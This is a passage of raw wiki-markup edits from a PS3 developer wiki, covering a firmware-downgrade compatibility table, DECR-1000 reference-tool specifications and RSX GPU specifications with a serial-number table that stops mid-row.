raymanvtw(RLOD+poweroff when try downgrade to 3.55):CECH2504A (JTP-001) with 3.56 from factory - datecode 1B //--&gt;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;(RLOD+)poweroff&amp;nbsp;@&amp;nbsp;downgrade&amp;nbsp;355&lt;/span&gt;&lt;br /&gt;&lt;small&gt;(3.56+ + [[spkg_hdr.tar|spkg]] fix + signed 3.55 priv : should work)&lt;/small&gt;&lt;br /&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + noFSM = OK&lt;/span&gt; || style=&quot;background:#FFCC00; color:black;&quot; | &lt;span style=&quot;background:#FFCC00; color:black;&quot;&gt;3.56&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background:#FFCC00; color:black;&quot;&gt;3.56&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background:#FFCC00; color:black;&quot;&gt;3.56&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 0B&lt;br /&gt;0B&lt;br /&gt;0C || [[CECH-25xx|CECH-25xx]]&amp;nbsp;([[JSD-00x|JSD-001]]) with&amp;nbsp;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;3.60&amp;nbsp;from&amp;nbsp;factory&lt;/span&gt; - &lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;1B&lt;/span&gt;&lt;br /&gt;[[CECH-25xx|CECH-25xx]]&amp;nbsp;([[JTP-00x|JTP-001]]) with&amp;nbsp;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;3.60&amp;nbsp;from&amp;nbsp;factory&lt;/span&gt; - &lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;[N.A.]&lt;/span&gt;&lt;br /&gt;[[CECH-30xx|CECH-30xx]]&amp;nbsp;([[KTE-00x|KTE-001]]) with&amp;nbsp;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;3.65&amp;nbsp;from&amp;nbsp;factory&lt;/span&gt; - &lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;[N.A.]&lt;/span&gt; || style=&quot;text-align:center;&quot; | F9 20 || style=&quot;text-align:center;&quot; | 0F 8E || style=&quot;text-align:center;&quot; | 2FFF0 || style=&quot;text-align:center;&quot; | 2F FB || style=&quot;text-align:center;&quot; | 2F FB || &lt;small&gt;&quot;metldr.2&quot;&lt;/small&gt;&lt;br /&gt;&lt;!--// Nodial2ne:CECH-3012A - Date Code [N.A.] factory 3.65 , bingoman cech2503b:jtp-001 //--&gt;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;(RLOD+)poweroff&amp;nbsp;@&amp;nbsp;downgrade&amp;nbsp;3.55&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;(RLOD+)poweroff&amp;nbsp;@&amp;nbsp;Patch + noFSM&lt;/span&gt; || style=&quot;background-color:#F06060; color:white;&quot; | &lt;span style=&quot;background-color:#F06060; color:white;&quot;&gt;3.60&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#F06060; color:white;&quot;&gt;3.60&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#F06060; color:white;&quot;&gt;3.60&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 0C || [[CECH-30xx|CECH-30xx]]&amp;nbsp;([[KTE-00x|KTE-001]]) with&amp;nbsp;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;?&amp;nbsp;from&amp;nbsp;factory&lt;/span&gt; - &lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;[?]&lt;/span&gt; || style=&quot;text-align:center;&quot; | F9 B0 || style=&quot;text-align:center;&quot; | 0F 97 || style=&quot;text-align:center;&quot; | 30070 || style=&quot;text-align:center;&quot; | 30 03 || style=&quot;text-align:center;&quot; | 30 03 || &lt;small&gt;&quot;metldr.2&quot;&lt;/small&gt;&lt;br /&gt;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;(RLOD+)poweroff&amp;nbsp;@&amp;nbsp;downgrade&amp;nbsp;3.55&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;(RLOD+)poweroff&amp;nbsp;@&amp;nbsp;Patch + noFSM&lt;/span&gt; || style=&quot;background-color:#F06060; color:white;&quot; | &lt;span style=&quot;background-color:#F06060; color:white;&quot;&gt;?&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 0C || [[CECH-30xx|CECH-30xx]]&amp;nbsp;([[KTE-00x|KTE-001]]) with&amp;nbsp;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;3.72&amp;nbsp;from&amp;nbsp;factory&lt;/span&gt; - &lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;[1C]&lt;/span&gt; || style=&quot;text-align:center;&quot; | F9 B0 || style=&quot;text-align:center;&quot; | 0F 97 || style=&quot;text-align:center;&quot; | 300F0 || style=&quot;text-align:center;&quot; | 30 0B || style=&quot;text-align:center;&quot; | 30 0B || &lt;small&gt;&quot;metldr.2&quot;&lt;/small&gt;&lt;br /&gt;&lt;!--// Nodial2ne:CECH-3012A - Date Code [N.A.] factory 3.72 , bingoman cech2503b:jtp-001 //--&gt;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;(RLOD+)poweroff&amp;nbsp;@&amp;nbsp;downgrade&amp;nbsp;3.55&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;(RLOD+)poweroff&amp;nbsp;@&amp;nbsp;Patch + noFSM&lt;/span&gt; || style=&quot;background-color:#F06060; color:white;&quot; | &lt;span style=&quot;background-color:#F06060; color:white;&quot;&gt;3.72&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 0D&lt;br /&gt;0D&lt;br /&gt;2C || [[CECH-40xx|CECH-40xx]]&amp;nbsp;([[MSX-00x|MSX-001]])&lt;br /&gt;[[CECH-40xx|CECH-40xx]]&amp;nbsp;([[MPX-00x|MPX-001]])&lt;br /&gt;[[CECH-40xx|CECH-40xx]]&amp;nbsp;([[MSX-00x|MSX-001]]) '12GB' || style=&quot;text-align:center;&quot; | F9 B0 || style=&quot;text-align:center;&quot; | 0F 97 || style=&quot;text-align:center;&quot; | 301F0 || style=&quot;text-align:center;&quot; | 30 1B || style=&quot;text-align:center;&quot; | 30 1B || &lt;small&gt;&quot;metldr.2&quot;&lt;/small&gt;&lt;br /&gt;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;(RLOD+)poweroff&amp;nbsp;@&amp;nbsp;downgrade&amp;nbsp;3.55&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color:#F06060; background-color:#FFFFFF; &quot;&gt;(RLOD+)poweroff&amp;nbsp;@&amp;nbsp;Patch + noFSM&lt;/span&gt; || style=&quot;background-color:#F06060; color:white;&quot; | &lt;span style=&quot;background-color:#F06060; color:white;&quot;&gt;4.20&lt;!--//BwE//--&gt;&lt;/span&gt;&lt;br /&gt;?&lt;br /&gt;&lt;span style=&quot;background-color:#F06060; color:white;&quot;&gt;4.22&lt;!--//baileyscream//--&gt;&lt;/span&gt;<br /> |-<br /> |}&lt;noinclude&gt;[[Category:Templates]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=DECR-1000&diff=43595 DECR-1000 2017-02-20T15:59:35Z <p>Mathieulh: /* Specifications */ Added more info on SACD issues</p> <hr /> <div>= DECR-1000(A/J) =<br /> <br /> == Specifications ==<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! [[:Category:Models|SubModels]]<br /> | [[DECR-1000A]] / [[DECR-1000J]]<br /> |-<br /> ! Type<br /> | 0x01<br /> |-<br /> ! Motherboard<br /> | [[TMU-520]]<br /> |-<br /> ! Flash Storage<br /> | [[K9F2G08U0M|2x 256MB NAND]]<br /> |-<br /> ! [[CELL BE]] / [[RSX]]<br /> | {{90nm}} / {{90nm}}<br /> |-<br /> ! [[South Bridge]]<br /> | [[CXD2973AGB-4]]<br /> |-<br /> ! [[Syscon Hardware|Syscon]]<br /> | [[CXR713F120A]]<br /> |-<br /> ! [[Communication Processor|CP]]<br /> | [[CXD9790GG]] [[TCP-520]]<br /> |-<br /> ! BDemu [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! GameOS [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! [[Bluray Drive]]<br /> | {{YES}}<br /> |-<br /> ! [[HDMI|HDMI Ports]]<br /> | 2<br /> |-<br /> ! [[:Category:Linux|OtherOS]]<br /> | {{NO}} (but [[vsh.self]] or [[sysconf_plugin.sprx]] can be patched to add [[:Category:Linux|OtherOS]] on Firmware [[320.001 DECR|3.20]] or below)<br /> |-<br /> ! [[USB|USB Ports]]<br /> | 6<br /> |-<br /> ! [[GbLAN|GbLAN Ports]]<br /> | 4 (1 for debugger) <br /> |-<br /> ! Serial Ports<br /> | 1 (Hidden next to LAN(DEV) lan port, used in SYSCON emergency updates)<br /> |-<br /> ! [[MultiCardReader|Flash Readers]]<br /> | Yes<br /> |-<br /> ! [[PS2_Compatibility|PS2 mode]]<br /> | {{NO}} (No Emotion Engine or Graphic Synthesizer on the motherboard, no [[Emulation#ps2emu|ps2emu software]] in the official firmware)<br /> |-<br /> ! [[PS1_Compatibility|PS1 mode]]<br /> | {{NO}} (No [[Emulation#ps1emu|ps1emu software]] in the official firmware)<br /> |-<br /> ! [[SA-CD]]<br /> | {{NO}} (The Bluray Drive is compatible but no software exists to play the discs in Official Reference Tool firmwares, EID3 lacks the proper keys normally present on retail consoles)<br /> |-<br /> ! [[Wifi|WiFi802.11b/g]]<br /> | {{YES}}<br /> |-<br /> ! SKU Release date<br /> | 2006<br /> |-<br /> ! [[SCEI PS3 SDK|SDK]] / [[System Software|Firmware]] support<br /> | =&amp;gt;1.0.0&lt;br /&gt;=&amp;gt;1.6.0 when refurbished/serviced (RSX rom version isn't supported on older hypervisor)&lt;br /&gt;&amp;nbsp;&amp;nbsp;or&lt;br /&gt;=&amp;gt;2.3.0 (Since Jan 2009)<br /> |-<br /> ! [[Template:Metbootldr|downgradeable Min. praxis]]<br /> | 0.08<br /> |-<br /> ! Other<br /> | contains prototype components, hardware is the same as the [[DEH-R1040]].<br /> |-<br /> ! [[Power Supply]] <br /> | nichihon [[ZSSR541iB]]<br /> * input: AC 100-240V 9.5-4A 50/60Hz (950-960 Watt)&lt;br /&gt;output:<br /> * DC+5V(Sub) 1.6A (8 W)<br /> * DC+3.3V 23A (75.9 W)<br /> * DC+5V 8.2A (41 W)<br /> * DC+12V 31.2A (374.4 W)&lt;!--// 2 labels exist: one stating 9.5-4A for whole range (brand unreadable), other only 9.5A (the highest current for the lowest supported voltage - &quot;nichihon&quot;) //--&gt;<br /> |}<br /> <br /> == Boards ==<br /> === Motherboard ===<br /> [[TMU-520]] [[1-871-645-11]], [[1-871-645-12]], [[1-871-645-13]] - Mainboard<br /> === SubBoards ===<br /> [[BMD-001]] [[1-871-575-11]] - Blu-ray drive controller board<br /> [[TAM-520]] [[1-871-636-11]] - Analog 4-ch. audio output<br /> [[TAV-520]] [[1-871-635-11]] - Analog AV out<br /> [[TBP-520]] [[1-871-644-11]] - Backplane for 2x SATA HDD + BD<br /> [[TCP-520]] [[1-871-646-11]] - Communication Processor board<br /> [[TEJ-520]] [[1-871-641-11]] - HDD Activity/Eject board<br /> [[TFL-520]] [[1-871-638-11]] - Front Panel LEDboard (GPI/GPO/Reset/Start...)<br /> [[TFP-520]] [[1-871-640-11]] - Front Panel Switchboard (GPI/GPO/Reset/Start...)<br /> [[TMR-520]] [[1-871-647-11]] - CP-helper board<br /> [[TMW-520]] [[0-347-825-02]] - Bt/Wifi board<br /> [[TSA-520]] [[1-871-639-11]] - BD PATA-&gt;SATA adapter<br /> [[TUU-520]] [[1-871-643-11]] - Front I/O (Foot-Sw/USB/CardReader)<br /> <br /> == Pictures ==<br /> &lt;Gallery&gt;<br /> File:DECR1000A-frontleft.jpg|[[DECR1000A]] - frontleft<br /> File:DECR1000A-front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A-topback.jpg|[[DECR1000A]] - topback<br /> File:DECR1000A-controller-top.jpg|[[DECR1000A]] - controller top<br /> File:DECR1000A-controller-back.jpg|[[DECR1000A]] - controller back<br /> <br /> File:DECR1000A - back.jpg|[[DECR1000A]] - back<br /> File:DECR1000A - back label.jpg|[[DECR1000A]] - back label<br /> File:DECR1000A - bottom.jpg|[[DECR1000A]] - bottom<br /> File:DECR1000A - front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A - front0.jpg|[[DECR1000A]] - front0<br /> File:DECR1000A - front1.jpg|[[DECR1000A]] - front1<br /> File:DECR1000A - front2.jpg|[[DECR1000A]] - front2<br /> File:DECR1000A - front3.jpg|[[DECR1000A]] - front3<br /> File:DECR1000A - front4.jpg|[[DECR1000A]] - front4<br /> File:DECR1000A - toplabel powerrating.jpg|[[DECR1000A]] - bottomlabel powerrating<br /> <br /> File:DECR-1000A - Nichicon ZSSR541iB 1-474-032-21 PSU labeling.jpg|[[DECR-1000A]] - Nichicon [[ZSSR541iB]] [[1-474-032-21]] [[Power Supply]] labeling<br /> &lt;/Gallery&gt;<br /> <br /> == Links ==<br /> <br /> [https://www.youtube.com/watch?v=lSnoCsZvQiM| Overview and the detailed explaination in French]<br /> &lt;br&gt;<br /> [https://mega.co.nz/#F!XcdAiZpb!-Zy5PmdUwDLKHAogZyvMuA| Pictures of the DECR-1000A boards]<br /> &lt;br&gt;<br /> [ftp://ip-240.net-80-236-71.issy.rev.numericable.fr/Multimedia/TEXT/Computers/Computer%20Architecture/PS3/Instruction_manual_e.pdf Instruction Manual]<br /> &lt;br&gt;<br /> https://fccid.io/AK8DEHR1000<br /> &lt;br&gt;<br /> https://fccid.io/pdf.php?id=686154<br /> <br /> == Comparison ==<br /> {{Reference Tool models}}<br /> <br /> <br /> {{Console Information}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=RSX&diff=43540 RSX 2017-02-02T09:17:38Z <p>Mathieulh: /* ROM Versions */ Removed a duplicate entry, fixed some typos</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SCEI CXD2971DGB.JPG|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971DGB]]&lt;br /&gt;[[File:RSX 90nm without IHS.jpg|200px|thumb|left||RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971AGB without IHS]]&lt;br /&gt;[[File:RSX-GDDR-BGA-lifted.jpg|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;GDDR3 BGA lifted]]&lt;br /&gt;[[File:RSX-GPUcore-lifted.jpg|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;GPUcore BGA lifted]]&lt;br /&gt;[[File:RSX-BGA-lifted-missingpads.jpg|200px|thumb|left|RSX - Reality Synthesizer&lt;br /&gt;BGA lifted&lt;br /&gt;PCB underneath]]&lt;br /&gt;[[File:Nvidia-Die-G70.png|200px|thumb|left|Nvidia G70 die shot]]&lt;br/&gt;[[File:RSX die - Image made by Héctor Martín.jpg|200px|thumb|left|RSX die, scraped with razorblade by Héctor Martín]]&lt;br/&gt;[[File:BGA_crack1.jpg|200px|thumb|left|BGA Cracking (one of the reasons for YLOD error)]]&lt;/div&gt;<br /> <br /> = RSX - Reality Synthesizer =<br /> <br /> The RSX 'Reality Synthesizer' is a proprietary graphics processing unit (GPU) codeveloped by Nvidia and Sony for the PlayStation 3 game console. It is a GPU based on the Nvidia 7800GTX graphics processor and, according to Nvidia, is a G70/G71 (previously known as NV47) hybrid architecture with some modifications. The RSX has separate vertex and pixel shader pipelines. The GPU makes use of 256 MB GDDR3 RAM clocked at 650&lt;!--// NOT 700!!!//--&gt; MHz with an effective transmission rate of 1.4 GHz and up to 224 MB of the 3.2 GHz XDR main memory via the CPU (480 MB max).<br /> <br /> == Specifications ==<br /> * &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;500&lt;/abbr&gt;&amp;nbsp;MHz on 90 nm process (shrunk to 65 nm in 2008 and to 40 nm in 2010)<br /> * Based on NV47 Chip (Nvidia GeForce 7800 Architecture)<br /> ** early development tools had NV47 with 256 bit local memory interface and 16 ROPs<br /> ** later RSX with 128bit local memory interface and 8 ROPs<br /> * Little Endian<br /> ** 300+ million transistors<br /> ** Multi-way programmable parallel floating-point shader pipelines<br /> *** Independent pixel/vertex shader architecture<br /> *** 24 parallel pixel-shader ALU pipes clocked @ 550 MHz<br /> **** 5 ALU operations per pipeline, per cycle (2 vector&lt;sub&gt;4&lt;/sub&gt; , 2 scalar/dual/co-issue and fog ALU, 1 Texture ALU)<br /> **** 27 floating-point operations per pipeline, per cycle<br /> *** 8 parallel vertex pipelines<br /> **** 2 ALU operations per pipeline, per cycle (1 vector&lt;sub&gt;4&lt;/sub&gt; and 1 scalar, dual issue)<br /> **** 10 FLOPS per pipeline, per cycle<br /> *** Floating Point Operations: 400.4 Gigaflops ((24 * 27 Flops + 8 * 10 Flops) * 550)<br /> ** 24 texture filtering units (TF) and 8 vertex texture addressing units (TA)<br /> *** 24 filtered samples per clock<br /> **** Maximum Texel fillrate: 12.0 GigaTexels per second (24 textures * 500&amp;nbsp;MHz)<br /> *** 32 unfiltered texture samples per clock, ( 8 TA x 4 texture samples )<br /> ** 8 Render Output units / pixel rendering pipelines<br /> *** Peak pixel fillrate (theoretical): 4.0 Gigapixel per second<br /> *** Maximum Z-buffering sample rate: 8.0 GigaSamples per second (2 Z-samples * 8 ROPs * 500&amp;nbsp;MHz)<br /> ** Maximum Dot product operations: 51 billion per second (combined with Cell CPU)<br /> ** 128-bit pixel precision offers rendering of scenes with High dynamic range rendering<br /> ** 256 MB GDDR3 RAM at &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;650&amp;nbsp;MHz&lt;/abbr&gt;&lt;!--// NOT 700 !! //--&gt;<br /> *** Earlier PS3 Models: Samsung K4J52324QC-SC14 rated max 700MHz<br /> *** Later PS3 Models: Qimonda HYB18H512322AF-14 (seen on CXD2971DGB)<br /> *** 128-bit memory bus width<br /> *** 22.4 GB/s read and write bandwidth<br /> ** Cell FlexIO bus interface<br /> *** Rambus XDR Memory interface bus width: 56bit out of 64bit (serial)<br /> *** 20 GB/s read to the Cell and XDR memory<br /> *** 15 GB/s write to the Cell and XDR memory<br /> ** Support for PSGL (OpenGL ES 1.1 + Nvidia Cg)<br /> ** Support for S3 Texture Compression<br /> <br /> <br /> <br /> More features are revealed in the following chart delineating the differences between the RSX and the nVidia 7800 GTX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Difference !! RSX !! nVidia 7800GTX<br /> |-<br /> | GDDR3 Memory bus || 128bit || 256bit<br /> |-<br /> | ROPs || 8 || 16<br /> |-<br /> | Post Transform and Lighting Cache || 63 max vertices || 45 max vertices<br /> |-<br /> | Total Texture Cache Per Quad of Pixel Pipes (L1 and L2) || 96kB || 48kB<br /> |-<br /> | CPU interface || FlexIO || PCI-Express 16x<br /> |-<br /> | Technology || 40nm/65nm/90nm || 110nm<br /> |-<br /> |}<br /> <br /> Other RSX features/differences include:<br /> <br /> More shader instructions<br /> Extra texture lookup logic (helps RSX transport data from XDR)<br /> Fast vector normalize <br /> <br /> Note that the cache (Post Transform and Lighting Vertext Cache) is located between the vector shader and the triangle setup.<br /> <br /> A sample flow of data inside the RSX would see them first processed by 8 vertex shaders. The output are then sent to the 24 active pixel shaders, which can involve the 24 active texture units. Finally, the data is passed to the 8 Raster Operation Pipeline units (ROPs), and on out to the GDDR3. Note that the pixel shaders are grouped into groups of four (called Quads). There are 7 Quads, with 1 redundant, leaving 6 Quads active, which provides us with the 24 active pixel shaders listed above (6 times 4 equals 24). Since each Quad has 96kB of L1 and L2 cache, the total RSX texture cache is 576kB. General RSX features include 2x and 4x hardware anti-aliasing, and support for Shader Model 3.0.<br /> <br /> == Serial Numbers @ SKU's ==<br /> &lt;gallery&gt;<br /> File:PS3 - RSX - 40nm 65nm 90nm - die sizes.jpg|[[RSX]] die sizes, left to right: 40nm 65nm 90nm<br /> &lt;/gallery&gt;<br /> <br /> The following is a small sample of serial numbers of the RSX by model number.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! PS3 Model !! Mobo Model !! Mobo serial !! RSX Serial !! Die Tech !! Die Size !! Remark<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971GB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-11 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-21 || [[CXD2971GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-31 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHDxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHExx]] || [[COK-00x#COK-002W|COK-002W]] || 1-873-513-xx || -? || 90nm || 258mm² || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHFxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971BGB]]&lt;br /&gt;&amp;nbsp;&amp;nbsp;or:&lt;br /&gt;[[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-31 || [[CXD2971-1GB]] || 90nm || 258mm² || -<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971-1GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHIxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHJxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-32 || [[CXD2982BGB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-42 || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHMxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHNxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHOxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHPxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHQxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991CGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991GGB]] || 65nm || ? 186mm² ? ||<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 